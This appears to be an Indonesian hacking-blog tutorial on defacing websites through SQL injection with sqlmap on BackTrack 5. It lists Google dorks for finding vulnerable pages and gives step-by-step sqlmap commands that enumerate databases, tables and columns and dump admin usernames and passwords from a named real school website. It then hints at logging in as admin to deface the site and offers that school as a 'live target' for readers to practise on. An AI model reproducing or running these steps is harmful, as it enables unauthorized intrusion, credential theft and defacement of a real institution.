Halo para sobat 4rtcode Cyber Team - Panda Undetected, kali ini saya akan menulis tentang
Cara Deface Dengan SQL Injection yang dikenal dengan teknik SQLmap di
BackTrack. Tools ini sudah ada di dalam File .ISO pada BackTrack.
Disini, saya menggunakan BackTrack 5 R3.
Pertama-tama, cari target yang vuln terhadap SQL Injection, berikut ini sedikit dork dari saya :
NB : GUNAKANLAH DENGAN BIJAK :)
Disini, saya menggunakan BackTrack 5 R3.
Pertama-tama, cari target yang vuln terhadap SQL Injection, berikut ini sedikit dork dari saya :
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
Dan masih banyak lagi dork
bertebaran di Google :D
Dalam Tutorial kali ini, saya akan menggunakan target salah satu Sekolah yang ada di Sidoarjo.
Untuk mengetahui Website tersebut Vuln atau tidak, silahkan tambahkan
tanda ‘ (petik satu) setelah atau sebelum nomor id tersebut, bisa juga dengan
menambahkan tanda - (minus) sebelum
nomor id tersebut.
Jika target tersebut Vuln terhadap SQLi, maka akan muncul kira-kira
seperti ini :
Jika sudah mendapatkan target, silahkan buka Terminal, kemudian ketikan
perintah “cd /pentest/database/sqlmap” (tanpa tanda petik) kemudian Enter.
Kemudian akan muncul seperti ini.
Kemudian untuk mencari
nama database, ketikkan “ ./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 --dbs” (tanpa tanda
petik) kemudian Enter.
Kemudian akan muncul
seperti ini :
Disana kita dapat
menemukan 2 Database, yaitu information_schema dan sman2sidoarjo_sman2sda
Setelah kita
mendapatkan Database tersebut, kita tulis “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase --tables”
(tanpa tanda petik) kemudian Enter.
Setelah itu akan
muncul beberapa Tabel.
Kemudian kita mencari
Colums dengan cara mengetik “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T
namatable --columns” (tanpa tanda petik) kemudian Enter.
Disini kita akan
menjumpai beberapa Columns dari Tabel Admin.
Kemudian, untuk
mengetahui isi dari Columns tersebut, kita ketikkan “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --dump” (tanpa tanda petik)
kemudian Enter.
Jika sudah mendapatkan
User + Pass, pasti Anda tau kan yang harus dilakukan ? :)
Nah, tinggal cari
Login Adminnya deh :D
Caranya banyak kok di
Google :)
Sekian dulu dari saya,
saya ucapkan Terimakasih Banyak :)
Untuk yang ingin
belajar SQL Map, silahkan menggunakan live target http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5
0 Comments
Bagaimana Pendapat Anda ?